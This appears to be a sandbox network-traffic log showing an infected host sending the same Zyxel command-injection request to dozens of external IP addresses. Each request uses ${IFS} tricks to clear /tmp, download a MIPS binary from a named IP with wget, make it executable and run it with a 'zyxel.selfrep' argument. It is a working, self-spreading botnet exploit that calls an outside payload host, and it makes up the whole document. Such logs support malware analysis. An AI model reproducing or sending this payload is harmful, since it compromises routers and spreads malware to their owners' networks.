                                                Jan 12, 2024 18:24:27.644762039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2408192.168.2.1334010213.65.160.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.644803047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2409192.168.2.1349154148.254.42.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.644874096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2410192.168.2.134668637.215.148.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.644928932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2411192.168.2.133487412.9.139.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.644965887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2412192.168.2.135928881.139.195.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.645011902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2413192.168.2.1333212128.3.26.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.645046949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2414192.168.2.133365453.46.222.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.645107031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2415192.168.2.135452647.120.146.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.645143986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2416192.168.2.1347256115.129.226.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.645194054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2417192.168.2.1357584196.90.236.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.645257950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2418192.168.2.1350250156.67.69.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.645308971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2419192.168.2.1336756185.225.164.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.645365000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2420192.168.2.135569013.197.214.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.645427942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2421192.168.2.135933631.64.30.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.645493984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2422192.168.2.1346436102.25.179.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.645549059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2423192.168.2.1347820142.89.155.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.645625114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2424192.168.2.1337126133.251.244.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.645669937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2425192.168.2.1349288197.125.203.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.645701885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2426192.168.2.13602929.237.176.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.645768881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2427192.168.2.1344958113.118.26.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.645847082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2428192.168.2.1356222119.11.195.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.645881891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2429192.168.2.1337606130.3.162.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.645945072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2430192.168.2.1336450132.239.219.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.645977974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2431192.168.2.1335632152.176.102.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.646037102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2432192.168.2.134435085.49.87.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.646080971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2433192.168.2.1360250170.67.228.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.646126986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2434192.168.2.1336262106.114.52.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.646172047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2435192.168.2.1344614147.46.223.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.646200895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2436192.168.2.13383644.197.6.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.646255970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2437192.168.2.133622236.72.59.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.646327972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2438192.168.2.1333724176.12.214.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.646395922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2439192.168.2.1345696160.185.186.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.646445036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2440192.168.2.133986672.234.115.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.646486044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2441192.168.2.1357000106.106.126.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.646558046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2442192.168.2.1354798147.215.44.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.646620989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2443192.168.2.135211683.62.68.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.646665096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2444192.168.2.135044462.153.159.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.646708965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2445192.168.2.1355366199.120.16.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.646765947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2446192.168.2.1352614141.225.206.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.646809101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2447192.168.2.1351574189.245.129.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.646859884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2448192.168.2.1337962178.187.157.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.646898031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2449192.168.2.1354480199.116.47.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.646931887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2450192.168.2.1354858115.105.146.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.647008896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2451192.168.2.1344310132.209.81.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.647058964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2452192.168.2.135929612.13.50.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.647121906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2453192.168.2.1346424189.82.198.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.647188902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2454192.168.2.135106858.212.83.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.647255898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2455192.168.2.135026472.43.248.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.647330999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2456192.168.2.134139213.115.160.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.647360086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2457192.168.2.1337672100.158.150.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.647413969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2458192.168.2.134610624.13.152.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.647475958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2459192.168.2.133881844.52.76.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.647547007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2460192.168.2.13395748.31.185.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.647619009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2461192.168.2.1353106186.210.0.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.647670984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2462192.168.2.1355990155.179.209.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.647725105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2463192.168.2.1357762211.212.233.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.647799969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2464192.168.2.1353934124.249.20.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.647846937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2465192.168.2.136025691.240.167.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.647892952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2466192.168.2.1355610140.181.180.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.647924900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2467192.168.2.1346144109.29.70.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.648005962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2468192.168.2.1341106183.62.68.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.648070097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2469192.168.2.1346892150.159.239.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.648117065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2470192.168.2.1351224162.214.157.188443
                                                TimestampBytes transferredDirectionData
